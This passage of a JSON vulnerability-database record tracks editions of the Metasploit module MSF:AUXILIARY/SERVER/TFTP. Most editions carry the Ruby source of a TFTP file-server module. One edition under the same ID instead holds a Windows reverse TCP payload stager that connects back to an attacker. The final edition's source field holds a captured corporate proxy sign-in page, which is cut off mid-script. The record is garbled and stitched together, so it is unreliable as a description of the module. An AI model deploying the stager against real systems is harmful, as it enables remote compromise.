'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-03T14:03:56", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": 
"This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-04T07:57:30", "history": [], "viewCount": 41, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-06-04T07:57:30"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "redhat", "idList": ["RHSA-2019:1456"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-69474"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "symantec", "idList": ["SMNTC-108651", "SMNTC-108634", "SMNTC-108599", "SMNTC-108623", "SMNTC-108571", "SMNTC-108643", "SMNTC-108648", "SMNTC-108641", "SMNTC-108654", "SMNTC-108600"]}], "modified": "2019-06-04T07:57:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, 
\"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-04T07:57:30", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "7a01c7b276e979c83feaadb7c4656ef1", "type": "metasploit", "bulletinFamily": "exploit", "title": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a VNC Dll via a reflective loader (staged). 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/stephenfewer/ReflectiveDLLInjection", "https://github.com/rapid7/ReflectiveDLLInjection"], "cvelist": [], "lastseen": "2019-06-21T16:38:05", "history": [], "viewCount": 41, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-06-04T07:57:30"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "redhat", "idList": ["RHSA-2019:1456"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-69474"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "symantec", "idList": ["SMNTC-108651", "SMNTC-108634", "SMNTC-108599", "SMNTC-108623", "SMNTC-108571", "SMNTC-108643", "SMNTC-108648", "SMNTC-108641", "SMNTC-108654", "SMNTC-108600"]}], "modified": "2019-06-04T07:57:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 
Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T16:38:05", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-21T22:43:48", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2019-06-21T22:43:48"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1109254743703769798", "KITPLOIT:6640979275825511240"]}, {"type": "threatpost", "idList": ["THREATPOST:C47F49D9725508ED836D7FCD6D957077", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1831-1:3FBA4", "DEBIAN:DLA-1789-2:82C69", "DEBIAN:DSA-4447-2:8C972"]}, {"type": "thn", "idList": ["THN:3740262E7693548F88688CB1EEDC492A", "THN:8A48B621ABB3BFA5403C0ECA54CBE534"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:36F3CC3E249355A592453C791E236092"]}, {"type": "talosblog", "idList": ["TALOSBLOG:688BE6618140B4A2CFD5100D561798BE"]}, {"type": "cve", "idList": ["CVE-2019-1904", "CVE-2019-12919", "CVE-2018-15890", "CVE-2018-16119"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141281", "OPENVAS:1361412562310140837"]}, {"type": 
"myhack58", "idList": ["MYHACK58:62201994644"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B6E332FAFDE207EBF7815D34BA7B6CB6"]}, {"type": "securelist", "idList": ["SECURELIST:0E5C78D5A5BB7C5BD0B8EA97F3F8D8E4"]}], "modified": "2019-06-21T22:43:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n 
#@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T22:43:48", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "ed074c5ad19db796fb0abada3d771a61", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-07T18:02:59", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-07-07T18:02:59"}, "dependencies": {"references": [{"type": "myhack58", "idList": ["MYHACK58:62201994902"]}, {"type": "cve", "idList": ["CVE-2019-10639", "CVE-2018-14733", "CVE-2019-1890", "CVE-2019-1886", "CVE-2018-20850"]}, {"type": "threatpost", "idList": ["THREATPOST:877715F6B7B3157A0BB04907D85EE1F6"]}, {"type": "kitploit", "idList": ["KITPLOIT:6269408450657572101", "KITPLOIT:2549439882250233553"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310891843"]}, {"type": "zdt", "idList": ["1337DAY-ID-32954", "1337DAY-ID-32955"]}, {"type": "exploitdb", "idList": ["EDB-ID:47076"]}, {"type": "securelist", "idList": ["SECURELIST:9A6AC9776541651616898893ADB1716A"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1844-1:DE689"]}, {"type": "thn", "idList": ["THN:4D88AC2FA8EC904F3CE016D6C763499C"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "f5", "idList": ["F5:K00724442"]}], "modified": "2019-07-07T18:02:59"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "<!-- username.html--><!DOCTYPE html><html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\"><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"><title>Welcome To Zscaler Directory Authentication</title><style type=\"text/css\">body { background-color: #FFF; font-family: Arial, sans-serif; font-size: 12px; text-align: center; color: #4B4F54; overflow: hidden; margin: 0;}a { color: #009dd0; cursor: pointer; text-decoration: none;}form { width: 100%; height: 100%; margin: 0; padding: 0;}input { font-family: Arial; font-size: 100%; margin: 0; width: 100%; vertical-align: top; color: #424242; display: inline-block; border: none; padding: 0; text-align: left; height: 100%; width: calc(100% -35px);}table { margin-top: 10px; text-align: center; background-color: white;}table.table-company-logo { background-color: #e3e3e3;}table.table-upper { border-radius: 10px;}table.table-lower { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; background-color: #f3f3f3;}table.table-field-label { margin-bottom: 2px;}table.table-field-input div.input-wrapper { display: block; border-color: #2a2c30;; width: inherit; padding-left: 10px;}table.table-field-input .input-wrapper.disabled { border-color: #cfd0d1;}table.zsc-company { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; background-color: #f3f3f3;}table.zsc-company td { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; font-size: 11px; color: #939393;}.table-half-column-fixed { width: 356px;}table + table, td table { margin-top: 0;}td.td-field-label { font-size: 16px; color: black;}td.td-field-act { font-size: 13px; color: #009dd0;}td.td-field-act img { vertical-align: middle;}img { max-height: 80px; max-width: 430px;}img.act-icon { padding-right:3px;}.or { background: #ff9500;}.gr { background: #e3e3e3;}.gy { background: 
#939597;}.yl { background: #ffc800;}.red { background: #c20000;}.pg { position: absolute; top: 0; bottom: 0; left: 0; right: 0; white-space: nowrap; height: 100%; overflow: auto;}.pg:before { content: \"\"; display: inline-block; height: 100%; vertical-align: middle;}.pg_cont { display: inline-block; vertical-align: middle; width: 100%;}.m_tbl { width: 90%; min-width: 600px; max-width: 758px; max-height: 258px; background: #FFF; white-space: normal; border: 3px solid #399c1d; border-radius: 10px;}.m_tbl.tbl_error { border-color: #77797c;}.eu_h.tbl_error { color: #77797c;}.eu_h { vertical-align: middle; font-weight: bold; border-radius: 10px; font-size: 24px; color: #399c1d; font-weight: normal; padding: 20px 20px 0 20px;}.sm { font-size: 20px; color: #696A6D; font-weight: normal;}.eu_co { font-size: 14px; color: #696A6D; white-space: normal; padding: 0 20px;}.eu_co.bsubmit { padding: 0 20px 20px 20px;}.eu_l { width: 500px; overflow: hidden; text-overflow: ellipsis; margin: 0 auto; line-height: normal;}.eu_l a { color: #0069AA; word-break: break-word;}.bh { min-height: 40px; display: block; max-height: 80px; color: #0076A9; font-size: 32px; overflow: hidden; padding-bottom: 15px;}.btn { background: #009dd0; color: #FFFFFF; border-radius: 5px; border: 2px solid #009dd0; cursor: pointer; display: inline-block; height: 30px; margin: 15px 0 15px; font-size: 18px; line-height: 26px; width: auto; padding: 0 20px;}.btn:focus, input:focus { outline: none;}.btn:hover { background: #fff; color: #0076A9;}.fo { height: 40px; line-height: 40px; font-size: 11px; padding-bottom: 0px; background-color: #f3f3f3; width: 100%; border-bottom-left-radius: 7px; border-bottom-right-radius: 7px; padding-left: 25px;}.ln { font-size: 13px; padding: 0 0 35px; font-style: italic;}.pb20 { padding-bottom: 20px;}.pb35 { padding-bottom: 35px;}.eu_co.st { font-size: 12px; padding: 10px 0; line-height: 20px; position: relative;}.ie-label { display: none;}.w-sp { -webkit-animation: spinner .8s linear 
infinite; animation: spinner .8s linear infinite; border: 2.5px solid #c6c6c6; border-radius: 100%; display: inline-block; height: 13px; position: relative; width: 13px; vertical-align: middle; top: -2px; margin-right: 6px;}.w-sp.grn { border-top-color: #399c1d;}.w-sp.gry { border-top-color: #77797c;}@-webkit-keyframes spinner { to { -webkit-transform: rotate(360deg); }}@keyframes spinner { to { transform: rotate(360deg); }}.not { color: #fd4239; font-size: 16px; padding-left: 0; padding-top: 0;}.demo-icon { color: green;}.s_img { vertical-align: bottom; padding-right: 5px; background: url(\"\") no-repeat; width: 55px; height: 17px; display: inline-block;}.f_btn + .f_btn { margin-left: 5px;}.f_btn { display: inline-block;}.arrow-box { padding: 15px; position: absolute; background: white; text-align: left; line-height: 16px; width: 295px; top: -40px; display: none; z-index: 10; border: 1px solid #c2a200; border-radius: 5px; padding: 15px; color: #c2a200; font-size: 13px;}.arrow-box li { list-style-type: none; color: #2a2c30;}.arrow-box-left { top: -10px; left: -335px;}.arrow-box-left:after, .arrow-box-left:before { left: 100%; top: 53px; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute;}.arrow-box-left:after { border-color: transparent; border-left-color: #FFFFFF; border-width: 5px; margin-top: -34px;}.arrow-box-left:before { border-color: transparent; border-left-color: #c2a200; border-width: 6px; margin-top: -35px;}.arrow-box-right { right: -335px; top: -20px;}.arrow-box-right:after, .arrow-box-right:before { right: 100%; top: 53px; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute; pointer-events: none;}.arrow-box-right:after { border-color: transparent; border-right-color: #FFFFFF; border-width: 5px; margin-top: -24px;}.arrow-box-right:before { border-color: transparent; border-right-color: #c2a200; border-width: 6px; margin-top: -25px;}.input-wrapper { height: 30px; line-height: 30px; 
margin-bottom: 10px; border: 1px solid #b0b0b0; position: relative; display: block; width: inherit; padding-left: 10px;}.input-wrapper div.input-wrapper-div-text { text-align: left; color: #b0b0b0; max-width: 334px; overflow: hidden; text-overflow: ellipsis;}.input-image { width: 17px; display: inline-block; vertical-align: middle; height: auto; float: left; position: absolute; top: 5px; width: 20px; height: 20px; left: 7px;}.input-wrapper.dotted-border { border: none; border-bottom: 1px dotted #77797C;}.error-content { overflow-y: auto; height: auto;}.error-content li { list-style-type: none;}.text-label-link { height: 32px; line-height: 32px; margin-bottom: 10px; text-align: left; padding-left: 10px; position: absolute; top: 0px; right: -100px;}.text-label-link.pwd { right: -140px;}.text-label-link:before { content: \"<<\"; letter-spacing: -0.15em; padding-right: 2px; font-size: 8px; line-height: 11px; color: #3892B8; vertical-align: middle;}.username { width: calc(100% -35px); display: inline-block; vertical-align: top; color: #424242; position: relative; overflow: hidden;}.button-link { width: auto; height: auto; background: none; color: #0076A9; text-decoration: underline; cursor: pointer; vertical-align: middle;}.hide { display: none;}.err-tri { width: 0; height: 0; border-top: 15px solid transparent; border-bottom: 15px solid transparent; position: absolute; top: 40px;}.err-tri-to-left { border-right: 15px solid #FF9130; left: -15px;}.err-tri-to-right { border-left: 15px solid #FF9130; right: -15px;}.err-tri-new { display: none; -ms-transform: rotate(45deg); -webkit-transform: rotate(45deg); transform: rotate(45deg); width: 16px; height: 16px; /*right: -9px; top: 47px;*/ right: -14px; top: 6px; position: absolute; border: 1px solid #c2a200;}.username_placeholder { font: 14px/normal sans-serif; left: 7px; top: 8px; width: 332px; height: 20px; position: absolute; overflow-x: hidden; font-size-adjust: none; font-stretch: normal; text-align: left; color: 
#939393;}.username_input { position: relative; top: 6px; height: 20px; left: -27px; z-index:15;}input.username_input { width: 295px;}.table-left-column, .table-right-column { width: 50%; display: inline-block;}.table-left-column table { padding-right: 10px;}.table-right-column table { padding-left: 10px;}.separator { height: 14px; margin-left: 8px; margin-right: 8px; border-left: 1px #cfd0d1 solid;}hr { background-color: #cfd0d1; margin-top: 16px; margin-bottom: 16px;}.eu_sh { font-size: 16px; color: #929496; vertical-align: middle; padding: 10px 20px 0 23px;}.eu_h_t { padding-left: 23px; font-size: 16px; color: #2a2c30;}.eu_h_t span { color: #009dd0;}.eu_co_aup_txt { font-size: 13px; color: #2a2c30; padding: 0 20px 0 23px;}.eu_co_aup_txt div { max-width:715px; word-wrap: break-word; overflow-x: hidden;}.eu_h_t_sub { font-size: 16px; color: #77797c; padding: 0 0 0 23px; display: inline-block; padding-bottom: 15px; margin-right: -15px;}.eu_h_t_sub_a { padding-left: 0; padding-bottom: 15px; display: inline-block; text-align: left;}.eu_h_t_sub_a a { font-size: 16px; color: #009dd0; padding: 0 0 0 23px; width: 215px;}.otp { background-color: white; padding-left: 0; padding-top: 16px; font-size:11px;}@media only screen and (max-width:640px) { .eu_l { width: 250px; } .input-wrapper { width: 100%; } .arrow-box { background: #FFFFFF; border: 1px solid #c2a200; width: 524px; } .arrow-box-right { top: -140px; left: -1px; } .arrow-box-left { top: -80px; left: -3px; } .arrow-box-left:after, .arrow-box-left:before, .arrow-box-right:after, .arrow-box-right:before { top: 117%; left: 48%; border: solid transparent; content: \" \"; height: 0; width: 0; position: absolute; } .arrow-box-right:after { border-color: transparent; border-top-color: #FFFFFF; border-width: 15px; margin-left: -15px; margin-top: -20px; } .arrow-box-right:before { border-color: transparent; border-top-color: #c2a200; border-width: 16px; margin-left: -16px; margin-top: -20px; } .arrow-box-left:after { 
border-color: transparent; border-top-color: #FFFFFF; border-width: 15px; margin-left: -15px; margin-top: -9px; } .arrow-box-left:before { border-color: transparent; border-top-color: #c2a200; border-width: 16px; margin-left: -16px; margin-top: -9px; } .text-label-link, .text-label-link.pwd { right: 0; top: 25px; } .table-left-column, .table-right-column { width: 100%; display: block; } .table-left-column table, .table-right-column table { padding-left: 0; padding-right: 0; } .eu_co_aup_txt div { white-space: normal; word-wrap: break-word; }}@media only screen and (max-width: 480px) { .table-half-column-fixed { width: inherit; } input.username_input { left: -2px; width: 100%; } .eu_co_aup_txt div { white-space: normal; word-wrap: break-word; } .m_tbl { min-width: 300px; } .pg_cont { position: relative; left: -3px; } .fo { text-align: center; }}</style><style type=\"text/css\">.bh.bh-scaled {overflow:visible;}</style><!--[if lte IE 7]><style type=\"text/css\">.act-icon {display: none;}</style><![endif]--><!--[if lte IE 7]><style type=\"text/css\">.ie-label {position: absolute;left: 5px;top: 10px;display: block;}.username_input {position: relative;top: 5px;height: 20px;left: -27px;}.username_placeholder {left: 7px;}</style><![endif]--><!--[if lte IE 8]><style type=\"text/css\">.table-left-column, .table-right-column {width: 100%;display: block;}.table-left-column table, .table-right-column table {padding-left: 0;padding-right: 0;}.arrow-box {background: white;border: 1px solid #c2a200;width: 95%;z-index: 100;}.arrow-box-right {top: -140px;left: -1px;}.arrow-box-left {top: -80px;left: 2px;}.arrow-box-left:after, .arrow-box-left:before,.arrow-box-right:after, .arrow-box-right:before {top: 117%;left: 48%;border: solid transparent;content: \" \";height: 0;width: 0;position: absolute;}.arrow-box-right:after {border-color: transparent;border-top-color: #FFFFFF;border-width: 15px;margin-left: -15px;margin-top: -20px;}.arrow-box-right:before {border-color: 
transparent;border-top-color: #c2a200;border-width: 16px;margin-left: -16px;margin-top: -20px;}.arrow-box-left:after {border-color: transparent;border-top-color: #FFFFFF;border-width: 15px;margin-left: -15px;margin-top: -9px;}.arrow-box-left:before {border-color: transparent;border-top-color: #c2a200;border-width: 16px;margin-left: -16px;margin-top: -9px;}</style><![endif]--><!--link href=\"/chf.css\" rel=stylesheet type=\"text/css\"--><script language=\"JavaScript\" type=\"text/JavaScript\">function getIEVersion() {var myNav = navigator.userAgent.toLowerCase();return (myNav.indexOf('msie') != -1) ? parseInt(myNav.split('msie')[1]) : false;}function validate(myform) {myform.lognsfc.value = myform.lognsfc.value.trim();var ln = myform.lognsfc.value;var error = document.getElementById(\"error-text\");if (ln == \"\") {error.style.display = \"block\";error.innerHTML = \"Please enter a login name in the form of an email address\";return false;}if (!ln.match('^([0-9a-zA-Z $#!%&\\'*+-/=?^_`{|}~]+[-._+&])*[0-9a-zA-Z $#!%&\\'*+-/=?^_`{|}~]+@([-_0-9a-zA-Z]+[.])+[a-zA-Z]{2,16}$')) {error.style.display = \"block\";error.innerHTML = \"The Login ID must be a valid email address\";return false;}error.style.display = \"none\";return true;}function delcookie(name) {document.cookie = name + '=1; expires=Thu, 01-Jan-70 00:00:01 GMT;';}function delete_fchcookie() {delcookie(\"_sm__fch\");}</script></head><body onload=\"delete_fchcookie()\"><div id=\"main-page\" class=\"pg gr\"><div class=\"pg_cont\"><!-- --><div id=\"flashform\" style=\"display:block;\"><form name=\"uform\" method=\"post\" action=\"https://login.zscalerone.net:443/sfc__lu\" id=\"uform\"><table class=\"table-company-logo\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tr><td class=\"bh bh-scaled\"><span id=\"cmpy_info\">tuxguy.org</span></td></tr></table><input type=\"hidden\" name=\"urlosfc\" size=\"25\" 
value=\"origurl=https://raw.githubusercontent.com/rapid7/metasploit-framework/master//modules/auxiliary/server/tftp.rb&wexps=1&_ordtok=MKW3WV347sWMDkvDSf1JfMtTrH&wexps=1\"><input type=\"hidden\" name=\"urlodmn\" size=\"25\" value=\"https://raw.githubusercontent.com/rapid7/metasploit-framework/master//modules/auxiliary/server/tftp.rb\"><input type=\"hidden\" name=\"jscript\" size=\"4\" value=\"0set\"><table class=\"m_tbl\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\"><tbody><tr><td valign=\"top\"><table class=\"table-upper\" width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" class=\"eu_h\"><img class=\"act-icon\"src=\"\">Sign In</td></tr><tr><td align=\"left\" class=\"eu_sh\">To keep you safe from internet threats, please sign in to your company's security service.<hr></td></tr><tr><td class=\"eu_co\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" width=\"100%\" style=\"width:100%;\"><div class=\"table-half-column-fixed\"><table width=\"100%\" class=\"table-field-label\" cellspacing=\"0\"cellpadding=\"0\"><tr><td align=\"left\" class=\"td-field-label\">User Name</td></tr></table><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"class=\"table-field-input\"><tr><td style=\"position: relative;\"><div class=\"input-wrapper\"><input id=\"username_input\" class=\"input username_input\" name=\"lognsfc\" value=\"\" type=\"text\" autofocus=\"true\"><label id=\"username_placeholder\" class=\"username_placeholder\" for=\"username_input\">Enter your User Name...</label></div></td></tr></table></div></td></tr></tbody></table></td></tr><tr><td class=\"eu_co\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tr><td align=\"left\" id=\"error-text\" class=\"eu_h sm not\" style=\"display: none;\"></td></tr></table></td></tr><tr><td class=\"eu_co\" class=\"bsubmit\" align=\"left\"><table cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"><tbody><tr><td width=\"50%\" 
style=\"width: 50%;\" align=\"left\"><input type=\"submit\" name=\"lsubmit\" class=\"btn\" value=\"Sign In\"onclick=\"return validate(this.form);\"></td><td width=\"50%\" style=\"width: 50%;\" align=\"right\"></td></tr></tbody></table></td></tr></tbody></table><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" class=\"table-lower\"><tr><td class=\"eu_co fo\" align=\"left\">Need help? Contact our support team at +91-9000000000 <span class=\"separator\"></span><a href=\"mailto:support@tuxguy.org\">support@tuxguy.org</a>.</td><td class=\"eu_co\"></td></tr></table></td></tr></tbody></table><table class=\"table-company-logo\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td></td></tr></tbody></table></form></div></div></div><script language=\"Javascript\" type=\"text/javascript\">if (document.forms && document.forms[0] && document.forms[0].jscript) {document.forms[0].jscript.value = \"1set\";}var placeholder = document.getElementById('username_placeholder');var input_field = document.getElementsByName('lognsfc')[0];var userNamePlaceHolderText = 'Enter your User Name...';placeholder.innerHTML = 